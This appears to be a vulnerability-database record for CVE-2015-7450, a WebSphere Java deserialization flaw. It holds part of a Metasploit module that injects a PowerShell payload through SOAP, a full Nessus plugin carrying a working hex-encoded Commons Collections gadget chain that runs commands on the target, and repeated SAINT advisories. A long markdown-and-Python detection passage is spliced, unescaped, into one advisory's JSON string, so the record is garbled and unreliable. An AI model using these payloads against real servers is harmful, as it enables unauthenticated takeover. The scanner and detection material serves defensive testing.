Rex::Text.decode_base64(serialized_stream) \nend \n \ndef gen_payload \n# Staging Native Payload \nexec_cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first) \nexec_cmd = exec_cmd.gsub(\"%COMSPEC% /b /c start /b /min \", \"\") \n \n# Size up RCE - Buffer \ncmd_lng = exec_cmd.length \nlng2str = \"0\" + cmd_lng.to_s(16) \nbuff = [lng2str].pack(\"H*\") \n \nrce_pld = buff + exec_cmd \nend \n \ndef soap_request(inject_payload) \n# SOAP Request \nreq = \"<?xml version='1.0' encoding='UTF-8'?>\" + \"\\r\\n\" \nreq += \"<SOAP-ENV:Envelope xmlns:SOAP-ENV=\\\"http://schemas.xmlsoap.org/soap/envelope/\\\" xmlns:xsi=\\\"http://www.w3.org/2001/XMLSchema-instance\\\" xmlns:xsd=\\\"http://www.w3.org/2001/XMLSchema\\\">\" + \"\\r\\n\" \nreq += \"<SOAP-ENV:Header xmlns:ns0=\\\"admin\\\" ns0:WASRemoteRuntimeVersion=\\\"7.0.0.0\\\" ns0:JMXMessageVersion=\\\"1.0.0\\\" ns0:SecurityEnabled=\\\"true\\\" ns0:JMXVersion=\\\"1.2.0\\\">\" + \"\\r\\n\" \nreq += \"<LoginMethod>BasicAuth</LoginMethod>\" + \"\\r\\n\" \nreq += \"</SOAP-ENV:Header>\" + \"\\r\\n\" \nreq += \"<SOAP-ENV:Body>\" + \"\\r\\n\" \nreq += \"<ns1:getAttribute xmlns:ns1=\\\"urn:AdminService\\\" SOAP-ENV:encodingStyle=\\\"http://schemas.xmlsoap.org/soap/encoding/\\\">\" + \"\\r\\n\" \nreq += \"<objectname xsi:type=\\\"ns1:javax.management.ObjectName\\\">\" + inject_payload + \"</objectname>\" + \"\\r\\n\" \nreq += \"<attribute xsi:type=\\\"xsd:string\\\">ringBufferSize</attribute>\" + \"\\r\\n\" \nreq += \"</ns1:getAttribute>\" + \"\\r\\n\" \nreq += \"</SOAP-ENV:Body>\" + \"\\r\\n\" \nreq += \"</SOAP-ENV:Envelope>\" + \"\\r\\n\" \n \nuri = target_uri.path \n \nres = send_request_raw({ \n'method' => 'POST', \n'version' => '1.1', \n'raw_headers' => \"Content-Type: text/xml; charset=utf-8\" + \"\\r\\n\" + \"SOAPAction: \\\"urn:AdminService\\\"\" + \"\\r\\n\", \n'uri' => normalize_uri(uri), \n'data' => req \n}) \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/141631/ibm_websphere_java_deserialize.rb.txt"}], "nessus": [{"lastseen": "2023-05-18T14:18:08", "description": "The remote IBM WebSphere Application Server is affected by a remote code execution vulnerability due to unsafe deserialize calls of unauthenticated Java objects to the Apache Commons Collections (ACC) library. An unauthenticated, remote attacker can exploit this, by sending a crafted SOAP request, to execute arbitrary code on the target host.", "cvss3": {}, "published": "2015-12-02T00:00:00", "type": "nessus", "title": "IBM WebSphere Java Object Deserialization RCE", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7450"], "modified": "2022-01-11T00:00:00", "cpe": ["cpe:/a:ibm:websphere_application_server", "cpe:/a:ibm:http_server"], "id": "WEBSPHERE_JAVA_SERIALIZE.NASL", "href": "https://www.tenable.com/plugins/nessus/87171", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87171);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/11\");\n\n script_cve_id(\"CVE-2015-7450\");\n script_bugtraq_id(77653);\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/10\");\n script_xref(name:\"CERT\", value:\"576313\");\n\n script_name(english:\"IBM WebSphere Java Object Deserialization RCE\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote WebSphere Application Server is affected by a remote code\nexecution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote IBM WebSphere Application Server is affected by a remote\ncode execution vulnerability due to unsafe deserialize calls of\nunauthenticated Java objects to the Apache Commons Collections (ACC)\nlibrary. 
An unauthenticated, remote attacker can exploit this, by\nsending a crafted SOAP request, to execute arbitrary code on the\ntarget host.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www-01.ibm.com/support/docview.wss?uid=swg21970575\");\n # https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9c6d83db\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate interim fix per the vendor advisory.\nAlternatively, ensure that all exposed ports used by the WebSphere\nApplication Server are firewalled from any public networks.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-7450\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'IBM WebSphere RCE Java Deserialization Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/a:ibm:websphere_application_server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ibm:http_server\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"websphere_detect.nasl\", \"websphere_liberty_detect.nbin\", \"os_fingerprint.nasl\");\n script_require_keys(\"www/WebSphere\");\n script_require_ports(\"Services/www\", 8880);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"string.inc\");\ninclude(\"http.inc\");\n\nappname = \"WebSphere\";\nos = get_kb_item_or_exit(\"Host/OS\");\nport = get_http_port(default:8880, embedded:FALSE);\nget_kb_item_or_exit(\"www/WebSphere/\" + port + \"/installed\");\n\nping_cmd = '';\nid_tag = hexstr(rand_str(length:10));\nif(\"windows\" >< tolower(os)) ping_cmd = \"ping -n 10 \";\nelse ping_cmd = \"ping -c 10 -p \" + string(id_tag) + \" \";\nping_cmd += compat::this_host();\n\n#\n# open connection to WebSphere.\n#\nsoc = open_sock_tcp(port);\nif (!soc) audit(AUDIT_SOCK_FAIL,port,appname);\n\n#\n# build SOAP request with arbitrary ping command\n#\nraddress = get_host_ip();\nrn = raw_string(0x0d, 0x0a);\n\nserObj = 
hex2raw(s:\"ACED00057372003273756E2E7265666C6563742E616E6E6F746174696F6E2E416E6E6F746174696F6E496E766F636174696F6E48616E646C657255CAF50F15CB7EA50200024C000C6D656D62657256616C75657374000F4C6A6176612F7574696C2F4D61703B4C0004747970657400114C6A6176612F6C616E672F436C6173733B7870737D00000001000D6A6176612E7574696C2E4D6170787200176A6176612E6C616E672E7265666C6563742E50726F7879E127DA20CC1043CB0200014C0001687400254C6A6176612F6C616E672F7265666C6563742F496E766F636174696F6E48616E646C65723B78707371007E00007372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E747400124C6A6176612F6C616E672F4F626A6563743B7870767200116A6176612E6C616E672E52756E74696D65000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000274000A67657452756E74696D65757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007400096765744D6574686F647571007E001E000000
02767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707671007E001E7371007E00167571007E001B00000002707571007E001B00000000740006696E766F6B657571007E001E00000002767200106A6176612E6C616E672E4F626A656374000000000000000000000078707671007E001B7371007E0016757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017400\");\nlen = strlen(ping_cmd);\nserObj += raw_string(len) + ping_cmd;\nserObj += hex2raw(s:\"740004657865637571007E001E0000000171007E00237371007E0011737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F40000000000010770800000010000000007878767200126A6176612E6C616E672E4F766572726964650000000000000000000000787071007E003A\");\n\nserObjB64 = base64(str:serObj);\n\nser1 = \"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\";\nser2 = \"rO0ABXNyABtqYXZheC5tYW5hZ2VtZW50Lk9iamVjdE5hbWUPA6cb620VzwMAAHhwdACxV2ViU3BoZXJlOm5hbWU9Q29uZmlnU2VydmljZSxwcm9jZXNzPXNlcnZlcjEscGxhdGZvcm09cHJveHksbm9kZT1MYXAzOTAxM05vZGUwMSx2ZXJzaW9uPTguNS41LjcsdHlwZT1Db25maWdTZXJ2aWNlLG1iZWFuSWRlbnRpZmllcj1Db25maWdTZXJ2aWNlLGNlbGw9TGFwMzkwMTNOb2RlMDFDZWxsLHNwZWM9MS4weA==\";\nser3 = \"rO0ABXVyABNbTGphdmEubGFuZy5PYmplY3Q7kM5YnxBzKWwCAAB4cAAAAAFzcgAkY29tLmlibS53ZWJzcGhlcmUubWFuYWdlbWVudC5TZXNzaW9uJ5mLeyYSGOUCAANKAAJpZFoADnNoYXJlV29ya3NwYWNlTAAIdXNlck5hbWV0ABJMamF2YS9sYW5nL1N0cmluZzt4cAAAAVEDKkaUAXQAEVNjcmlwdDE1MTAzMmE0Njk0\";\nser4 = \"rO0ABXVyABNbTGphdmEubGFuZy5TdHJpbmc7rdJW5+kde0cCAAB4cAAAAAF0ACRjb20uaWJtLndlYnNwaGVyZS5tYW5hZ2VtZW50LlNlc3Npb24=\";\n\nxmlObj = \"<?xml version='1.0' encoding='UTF-8'?>\" + rn +\n'<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\">' + rn +\n'<SOAP-ENV:Header 
ns0:JMXConnectorContext=\"'+ser1+'\" xmlns:ns0=\"admin\" ns0:WASRemoteRuntimeVersion=\"8.5.5.7\" ns0:JMXMessageVersion=\"1.2.0\" ns0:JMXVersion=\"1.2.0\">' + rn +\n'</SOAP-ENV:Header>' + rn +\n'<SOAP-ENV:Body>' + rn +\n'<ns1:invoke xmlns:ns1=\"urn:AdminService\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">' + rn +\n'<objectname xsi:type=\"ns1:javax.management.ObjectName\">'+ser2+'</objectname>' + rn +\n'<operationname xsi:type=\"xsd:string\">getUnsavedChanges</operationname>' + rn +\n'<params xsi:type=\"ns1:[Ljava.lang.Object;\">'+serObjB64+'</params>' + rn +\n'<signature xsi:type=\"ns1:[Ljava.lang.String;\">'+ser4+'</signature>' + rn +\n'</ns1:invoke>' + rn +\n'</SOAP-ENV:Body>' + rn +\n'</SOAP-ENV:Envelope>';\n\ncontentLen = strlen(xmlObj);\n\ndata = \"POST / HTTP/1.0\" + rn +\n\"Host: \"+ raddress +\":\"+ string(port) + rn +\n\"Content-Type: text/xml; charset=utf-8\" + rn +\n\"Content-Length: \" + string(contentLen) + rn +\n'SOAPAction: \"urn:AdminService\"' + rn + rn +\nxmlObj;\n\nfilter = \"icmp and icmp[0] = 8 and src host \" + get_host_ip();\nresponse = send_capture(socket:soc, data:data, pcap_filter:filter);\nicmp = tolower(hexstr(get_icmp_element(icmp:response, element:\"data\")));\nclose(soc);\n\n# No response, meaning we didn't get in\nif(isnull(icmp) || (\"windows\" >!< tolower(os) && id_tag >!< icmp)) audit(AUDIT_LISTEN_NOT_VULN, appname, port);\n\nif (report_verbosity > 0)\n{\n report =\n '\\nNessus was able to exploit a Java deserialization vulnerability by' +\n '\\nsending a crafted Java object.' 
+\n '\\n';\n security_hole(port:port, extra:report);\n}\nelse security_hole(port:port);\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "saint": [{"lastseen": "2021-07-28T14:33:26", "description": "Added: 02/03/2016 \nCVE: [CVE-2015-7450](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7450>) \n\n\n### Background\n\nIBM WebSphere Management console 7.x and 8.5.0 - 8.5.5.7 are packaged with a vulnerable version of the Apache Commons package. \n\n### Problem\n\nApache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \n\n### Limitations\n\nThis exploit was tested against WebSphere 8.5.5.1 on Redhat Enterprise Linux 7. \n\n### References\n\n<http://www-01.ibm.com/support/docview.wss?uid=swg21970575> \n\n\n### Resolution\n\nInstall the patch provided in IBM security bulletin swg21970575. 
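The Nessus check above shows the whole attack shape: a Commons Collections 3.x gadget chain (AnnotationInvocationHandler, LazyMap, ChainedTransformer, ConstantTransformer holding java.lang.Runtime, then InvokerTransformer calls to getMethod, invoke and exec) is serialized, base64-encoded into the `<params>` element of a `urn:AdminService` `invoke`, and POSTed to the SOAP connector (default port 8880) without authentication; the scanner then confirms code execution by watching for the ICMP echo the injected `ping` sends back. Because Java serialization writes every class descriptor as a plain 2-byte-length ASCII name, the chain is visible in the request body before any `readObject` runs. The following added Python example (not Tenable's, Greenbone's, SAINT's or IBM's code) demonstrates that detection side: it pulls the base64 blob out of a SOAP `invoke`, checks the `0xACED0005` stream magic, heuristically lists the `TC_CLASSDESC` class names, and flags the ones belonging to the gadget chain the scanner payload serializes. The envelope builder, the sample stream and its zeroed serialVersionUID values are constructed for the example; the class-name scanner is a heuristic over descriptor records, not a full Java serialization parser.

```python
"""Detect a Commons Collections gadget chain in a WebSphere SOAP JMX invoke.
Added example, not scanner or vendor code; the envelope and stream builders
below are constructed so the detector can be exercised offline."""
import base64
import re
import struct

STREAM_MAGIC = b"\xac\xed\x00\x05"          # Java serialization header, stream version 5
TC_NULL, TC_CLASSDESC, TC_OBJECT = 0x70, 0x72, 0x73
TC_ARRAY, TC_CLASS, TC_ENDBLOCKDATA = 0x75, 0x76, 0x78

# Classes the scanner payload serializes (the CC 3.x InvokerTransformer chain).
GADGET_CLASSES = {
    "sun.reflect.annotation.AnnotationInvocationHandler",
    "org.apache.commons.collections.map.LazyMap",
    "org.apache.commons.collections.functors.ChainedTransformer",
    "org.apache.commons.collections.functors.ConstantTransformer",
    "org.apache.commons.collections.functors.InvokerTransformer",
}

# Dotted Java class name, optionally an array descriptor such as "[Lorg.x.Y;".
CLASS_NAME_RE = re.compile(r"^(\[+L)?[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)+;?$")
PARAMS_RE = re.compile(r"<params\b[^>]*>([^<]*)</params>")


def class_names(stream: bytes) -> list:
    """Heuristically list class names from TC_CLASSDESC records: a 0x72 tag
    preceded by an object/array/class tag or a block-data end, then a 2-byte
    big-endian length and an ASCII name.  A scanner, not a stream parser."""
    if not stream.startswith(STREAM_MAGIC):
        return []
    names, i = [], 4
    while i + 3 <= len(stream):
        if stream[i] == TC_CLASSDESC and stream[i - 1] in (TC_OBJECT, TC_ARRAY, TC_CLASS, TC_ENDBLOCKDATA):
            (length,) = struct.unpack(">H", stream[i + 1:i + 3])
            raw = stream[i + 3:i + 3 + length]
            name = raw.decode("ascii", errors="replace") if len(raw) == length else ""
            if CLASS_NAME_RE.match(name):
                names.append(name)
                i += 3 + length          # skip the name so bytes inside it are not re-scanned
                continue
        i += 1
    return names


def inspect_soap_invoke(body: str) -> dict:
    """Extract the base64 <params> blob of an AdminService invoke and report
    which gadget-chain classes it carries."""
    miss = {"serialized": False, "classes": [], "gadgets": []}
    m = PARAMS_RE.search(body)
    if not m:
        return miss
    try:
        blob = base64.b64decode(re.sub(r"\s+", "", m.group(1)), validate=True)
    except ValueError:                   # binascii.Error is a ValueError
        return miss
    if not blob.startswith(STREAM_MAGIC):
        return miss
    seen = list(dict.fromkeys(class_names(blob)))   # dedupe, keep stream order
    return {"serialized": True, "classes": seen,
            "gadgets": [c for c in seen if c in GADGET_CLASSES]}


# ---- constructed inputs for exercising the detector ----------------------

def class_desc(name: str) -> bytes:
    """Minimal TC_CLASSDESC: name, zeroed serialVersionUID (constructed),
    SC_SERIALIZABLE flag, zero fields, end of annotation, no superclass."""
    n = name.encode("ascii")
    return (bytes([TC_CLASSDESC]) + struct.pack(">H", len(n)) + n
            + b"\x00" * 8 + b"\x02" + b"\x00\x00" + bytes([TC_ENDBLOCKDATA, TC_NULL]))


def fake_stream(names) -> bytes:
    """Constructed stream of one empty TC_OBJECT per class; it carries the
    same descriptor names as a real chain but is not a working gadget."""
    return STREAM_MAGIC + b"".join(bytes([TC_OBJECT]) + class_desc(n) for n in names)


def b64_stream(names) -> str:
    return base64.b64encode(fake_stream(names)).decode()


def soap_invoke(params_b64: str, operation: str = "getUnsavedChanges") -> str:
    """Constructed envelope shaped like the scanner's (objectname omitted)."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\r\n'
        '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"'
        ' xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"'
        ' xmlns:xsd="http://www.w3.org/2001/XMLSchema">\r\n'
        '<SOAP-ENV:Body><ns1:invoke xmlns:ns1="urn:AdminService">\r\n'
        f'<operationname xsi:type="xsd:string">{operation}</operationname>\r\n'
        f'<params xsi:type="ns1:[Ljava.lang.Object;">{params_b64}</params>\r\n'
        '</ns1:invoke></SOAP-ENV:Body></SOAP-ENV:Envelope>'
    )


if __name__ == "__main__":
    chain = ["sun.reflect.annotation.AnnotationInvocationHandler",
             "org.apache.commons.collections.map.LazyMap",
             "org.apache.commons.collections.functors.ChainedTransformer",
             "org.apache.commons.collections.functors.InvokerTransformer",
             "java.lang.Runtime"]
    print("gadgets:", inspect_soap_invoke(soap_invoke(b64_stream(chain)))["gadgets"])
    print("benign :", inspect_soap_invoke(soap_invoke(b64_stream(["java.lang.Integer"])))["gadgets"])
```

The check belongs in front of the SOAP connector (a reverse proxy or WAF rule on the admin port), and it is a stop-gap rather than a fix: the class names can be obfuscated only as far as the JVM still has to resolve them, so descriptor scanning catches the known chain but not a new gadget, which is why the vendor fix (replacing commons-collections with a version whose functors refuse to deserialize, plus the interim fix) remains the real remediation. The scanners' success criterion is also worth turning into a detection: an application server that suddenly emits ICMP echo requests, or any outbound `ping`, toward an external host right after a POST to port 8880 is the footprint of exactly this check.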
\n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-02-03T00:00:00", "type": "saint", "title": "IBM WebSphere Management Server Apache Commons", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2016-02-03T00:00:00", "id": "SAINT:C049B327B327D8889E6EDEE0F0EFB1CB", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/websphere_serialjava", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:53", "description": "Added: 02/03/2016 \nCVE: [CVE-2015-7450](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7450>) \n\n\n### Background\n\nIBM WebSphere Management console 7.x and 8.5.0 - 8.5.5.7 are packaged with a vulnerable version of the Apache Commons package. \n\n### Problem\n\nApache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. 
\n\n### Limitations\n\nThis exploit was tested against WebSphere 8.5.5.1 on Redhat Enterprise Linux 7. \n\n### References\n\n<http://www-01.ibm.com/support/docview.wss?uid=swg21970575> \n\n\n### Resolution\n\nInstall the patch provided in IBM security bulletin swg21970575. \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {}, "published": "2016-02-03T00:00:00", "type": "saint", "title": "IBM WebSphere Management Server Apache Commons", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-7450"], "modified": "2016-02-03T00:00:00", "id": "SAINT:9C099C4B9A40BE916B04858EBBBB06B1", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/websphere_serialjava", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2023-05-19T02:30:15", "description": "Added: 02/03/2016 \nCVE: [CVE-2015-7450](<https://vulners.com/cve/CVE-2015-7450>) \n\n\n### Background\n\nIBM WebSphere Management console 7.x and 8.5.0 - 8.5.5.7 are packaged with a vulnerable version of the Apache Commons package. \n\n### Problem\n\nApache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \n\n### Limitations\n\nThis exploit was tested against WebSphere 8.5.5.1 on Redhat Enterprise Linux 7. \n\n### References\n\n<http://www-01.ibm.com/support/docview.wss?uid=swg21970575> \n\n\n### Resolution\n\nInstall the patch provided in IBM security bulletin swg21970575. 
\n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-02-03T00:00:00", "type": "saint", "title": "IBM WebSphere Management Server Apache Commons", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2016-02-03T00:00:00", "id": "SAINT:66FBA7CC8FD20610677EE0D63C3A16A6", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/websphere_serialjava", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-28T14:59:50", "description": "Added: 02/03/2016 \nCVE: [CVE-2015-7450](<https://vulners.com/cve/CVE-2015-7450>) \n\n\n### Background\n\nIBM WebSphere Management console 7.x and 8.5.0 - 8.5.5.7 are packaged with a vulnerable version of the Apache Commons package. \n\n### Problem\n\nApache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. 
\n\n### Limitations\n\nThis exploit was tested against WebSphere 8.5.5.1 on Redhat Enterprise Linux 7. \n\n### References\n\n<http://www-01.ibm.com/support/docview.wss?uid=swg21970575> \n\n\n### Resolution\n\nInstall the patch provided in IBM security bulletin swg21970575. \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-02-03T00:00:00", "type": "saint", "title": "IBM WebSphere Management Server Apache Commons", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7450"], "modified": "2016-02-03T00:00:00", "id": "SAINT:2A4358BF31AF1DF12CC0825DE2A0B1D2", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/websphere_serialjava", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:37:07", "description": "The host is running IBM WebSphere\n Application Server and is prone to unserialize vulnerability.", "cvss3": {}, "published": "2015-11-17T00:00:00", "type": "openvas", "title": "IBM WebSphere Application Server Unserialize Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7450"], "modified": 
"2019-02-21T00:00:00", "id": "OPENVAS:1361412562310806624", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806624", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ibm_websphere_application_server_unserialize_vuln.nasl 13803 2019-02-21 08:24:24Z cfischer $\n#\n# IBM WebSphere Application Server Unserialize Vulnerability\n#\n# Authors:\n# Shakeel <bshakeel@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:ibm:websphere_application_server\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806624\");\n script_version(\"$Revision: 13803 $\");\n script_cve_id(\"CVE-2015-7450\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-02-21 09:24:24 +0100 (Thu, 21 Feb 2019) $\");\n script_tag(name:\"creation_date\", 